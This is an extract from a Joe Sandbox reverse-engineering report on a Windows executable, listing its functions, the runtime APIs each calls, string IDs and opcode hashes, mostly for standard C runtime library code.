                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2372200979-0
                                                                                                                                                                        • Opcode ID: d025baa3bfed1d52c7650ca4328ac73558b961a4deb1a1ba8312f61d2c30a9a1
                                                                                                                                                                        • Instruction ID: 6618cf343641e494afb155895f4482d801b8f96dd2edf06979c0a09ab6a6c6c3
                                                                                                                                                                        • Opcode Fuzzy Hash: d025baa3bfed1d52c7650ca4328ac73558b961a4deb1a1ba8312f61d2c30a9a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 0F51BFB1D08209DFCB11DF68C844BAEBBF4EF14724F148159E845AB391D7B4AA40EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F53F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F53F57
                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00F53F5F
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F53FE8
                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00F54013
                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00F54068
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                        • String ID: csm
                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                        • Opcode ID: e38439e54a571c2cd459715d25be6fd08a20cbfd3ad1604325e6aa960382e941
                                                                                                                                                                        • Instruction ID: 814cd7268e443e15c7665551f43c262e63006fdeb269ef018756dbd38fd1b704
                                                                                                                                                                        • Opcode Fuzzy Hash: e38439e54a571c2cd459715d25be6fd08a20cbfd3ad1604325e6aa960382e941
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A41D234E002089BCF14DF68CC81A9EBBF1AF44369F148055EE189B392D735EA09EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F672FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00F67408,00F63841,0000000C,?,00000000,00000000,?,00F67632,00000021,FlsSetValue,00F7BD58,00F7BD60,?), ref: 00F673BC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                        • Opcode ID: 743fad180085bbacbf23ed7674b5e45bb9f9bb7362fecd1554addb464e8b9a18
                                                                                                                                                                        • Instruction ID: ef0101cda76669dfcb32864a13f60a694fb526ea2891959d59f69cdc6c5c512b
                                                                                                                                                                        • Opcode Fuzzy Hash: 743fad180085bbacbf23ed7674b5e45bb9f9bb7362fecd1554addb464e8b9a18
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A21E436F09315EBCB21BB64AC42A6A37699F42774F240220FD19A7390E771ED00F6E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3B500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B531
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B54F
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B577
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000000C,00000000,72A902E8,?,00000000,00000000), ref: 00F3B5CF
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3B6B7
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B6E1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3931714976-0
                                                                                                                                                                        • Opcode ID: b5fe0ed3c1611289dc3c9293e1fe279f5ffc608c62d22a98929317ef92888825
                                                                                                                                                                        • Instruction ID: 77112ad6296edc56383222f9934aaea0c32d155d789dfab2376c0d5d6a3eab32
                                                                                                                                                                        • Opcode Fuzzy Hash: b5fe0ed3c1611289dc3c9293e1fe279f5ffc608c62d22a98929317ef92888825
                                                                                                                                                                        • Instruction Fuzzy Hash: 1651E471D00209DFDB11CF58C8917AEBBB4FF10324F24819DE915AB392D7B59A04EB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3B700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B731
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B74F
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B777
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,00000000,72A902E8,?,00000000,00000000), ref: 00F3B7CF
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3B863
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B88D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3931714976-0
                                                                                                                                                                        • Opcode ID: bad4c0e36179b790948b34e9408b8c2b0b0fca9d2f57277b73db527f489ebb89
                                                                                                                                                                        • Instruction ID: 91a179bfc241765a0b0ee217260ffcf3198f4a89abcfdc766b3475b8e980bc91
                                                                                                                                                                        • Opcode Fuzzy Hash: bad4c0e36179b790948b34e9408b8c2b0b0fca9d2f57277b73db527f489ebb89
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B51AC71D04218DFCB11CF58C8A4BAEBBB4EF54720F24855DE905AB381D7B4AE01EB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F60351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                                                        • API String ID: 3509577899-3206640213
                                                                                                                                                                        • Opcode ID: e5399c4d66ba79c7e88c5372bbc951644db91d40846360661ef5834ec624c7b2
                                                                                                                                                                        • Instruction ID: 43d1f6785de71ca804df4906971ed583ed0c45a443d223347802c22fdeb547fc
                                                                                                                                                                        • Opcode Fuzzy Hash: e5399c4d66ba79c7e88c5372bbc951644db91d40846360661ef5834ec624c7b2
                                                                                                                                                                        • Instruction Fuzzy Hash: CAC1DD35D00206DACB24DF68C989BBB77B0EF45320F384049E906AB251DB36AD41FF61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F55978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00F5596F,00F54900,00F5358F), ref: 00F55986
                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F55994
                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F559AD
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00F5596F,00F54900,00F5358F), ref: 00F559FF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                        • Opcode ID: 1ef0bb51727aeac640705790d81fcfcd217f00bbb0c7bf2fdc7fc92595e6ed2f
                                                                                                                                                                        • Instruction ID: 03c541456d5b2602a5a7c4e9c630a219c1aaf4f9358ca113f0534a644c7ffd38
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ef0bb51727aeac640705790d81fcfcd217f00bbb0c7bf2fdc7fc92595e6ed2f
                                                                                                                                                                        • Instruction Fuzzy Hash: E901B533609B15EFA62527747C95AAA3754DB01BB77300329FE24D51F1EE294C4972D0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F33230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,URL,00000000,?,72A902E8,?,00000004), ref: 00F33294
                                                                                                                                                                        • MoveFileW.KERNEL32(?,00000000), ref: 00F3354A
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F33592
                                                                                                                                                                          • Part of subcall function 00F31A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00F31AF7
                                                                                                                                                                          • Part of subcall function 00F31A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00F31B7D
                                                                                                                                                                          • Part of subcall function 00F32E60: LocalFree.KERNEL32(?,72A902E8,?,?,00F73C40,000000FF,?,00F31242,72A902E8,?,?,00F73C75,000000FF), ref: 00F32EB1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                                                        • String ID: URL$url
                                                                                                                                                                        • API String ID: 853893950-346267919
                                                                                                                                                                        • Opcode ID: 12eb6d35fef01d2d23bb50fbc5d798933827724b78496beba04d082c6c328ba5
                                                                                                                                                                        • Instruction ID: affc23e497d4905a031731b150cb2eb7b51ab3108f5b436aba7fe9f1fc5432e1
                                                                                                                                                                        • Opcode Fuzzy Hash: 12eb6d35fef01d2d23bb50fbc5d798933827724b78496beba04d082c6c328ba5
                                                                                                                                                                        • Instruction Fuzzy Hash: 4BC17570D14268DADB24DF28CC98BDDBBB4BF14314F1042D9D009A7291EBB96B88DF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F336D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F33735
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00F74215,000000FF), ref: 00F3381A
                                                                                                                                                                          • Part of subcall function 00F32310: GetProcessHeap.KERNEL32 ref: 00F32365
                                                                                                                                                                          • Part of subcall function 00F346F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00F33778,-00000010,?,?,?,00F74215,000000FF), ref: 00F34736
                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00F337C6
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00F74215,000000FF), ref: 00F337DB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                                        • String ID: ntdll.dll
                                                                                                                                                                        • API String ID: 3941625479-2227199552
                                                                                                                                                                        • Opcode ID: 3d341bed1b964988c994765e8952865144c6324cbcaee33922fb90da5e4b98d5
                                                                                                                                                                        • Instruction ID: 88804ee1e7be00e963dd4460ea831ac3f1d634a8ad3a38ce8e2f8c3c8888da97
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d341bed1b964988c994765e8952865144c6324cbcaee33922fb90da5e4b98d5
                                                                                                                                                                        • Instruction Fuzzy Hash: 96419571A006099FDB10EF68DC45BEEB7A4FF14720F144529E916D72C1E7B4AA04DB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F31A20: LocalFree.KERNEL32(?), ref: 00F31A42
                                                                                                                                                                          • Part of subcall function 00F53E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F31434,?,?,00F3D341,00F31434,00F88B5C,?,00F31434,?,00000000), ref: 00F53EBA
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(72A902E8,72A902E8,?,?,00000000,00F74981,000000FF), ref: 00F362EB
                                                                                                                                                                          • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                          • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00F362B0
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F362B7
                                                                                                                                                                          • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                          • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                          • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                                                                                        • API String ID: 1333104975-3789238822
                                                                                                                                                                        • Opcode ID: b656b04648db29ae68777f4302e8c8fd212d75d3ce72deccc5004f9584f028a1
                                                                                                                                                                        • Instruction ID: d17b84973946d42c8aa8e19ca6e4c7d6551bf30292427b58d522f10a169670e5
                                                                                                                                                                        • Opcode Fuzzy Hash: b656b04648db29ae68777f4302e8c8fd212d75d3ce72deccc5004f9584f028a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 65219371D54709EFCB10EFA4DD06BADB7A8FB15B21F100225E915932D0E778A504AB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F48451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                        • String ID: $+xv
                                                                                                                                                                        • API String ID: 2204710431-1686923651
                                                                                                                                                                        • Opcode ID: 1b3bd739266ef2adc04035d6528d1004d090bf7c8700521c65ffe8229c1515ae
                                                                                                                                                                        • Instruction ID: 3290cb98755b43613af414f042c2e8a98c18bd00a98f134edb16e268f3ff8b28
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3bd739266ef2adc04035d6528d1004d090bf7c8700521c65ffe8229c1515ae
                                                                                                                                                                        • Instruction Fuzzy Hash: 7421C4B1904B926ED725DF74C89073FBEF8AB08351F04455AE859C7A42D778E602DBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F36250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(72A902E8,72A902E8,?,?,00000000,00F74981,000000FF), ref: 00F362EB
                                                                                                                                                                          • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                          • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00F362B0
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F362B7
                                                                                                                                                                          • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                          • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                          • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                                                                                        • API String ID: 2056477612-3789238822
                                                                                                                                                                        • Opcode ID: d59fecf39f74d43deeaeecab41b0ece38b3472c74efd63538da57bd9ad9de472
                                                                                                                                                                        • Instruction ID: 1b1787aaf452b2307a2f57c571d2b20cc170d354b3dd6df6c2a75698ff063cbd
                                                                                                                                                                        • Opcode Fuzzy Hash: d59fecf39f74d43deeaeecab41b0ece38b3472c74efd63538da57bd9ad9de472
                                                                                                                                                                        • Instruction Fuzzy Hash: C911A272D14718EFCB10DF54DD05BA9B7A8FB15B20F00426AE815D37D0E775A904EB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F569E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00F56AA3,?,?,00F8DDCC,00000000,?,00F56BCE,00000004,InitializeCriticalSectionEx,00F797E8,InitializeCriticalSectionEx,00000000), ref: 00F56A72
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
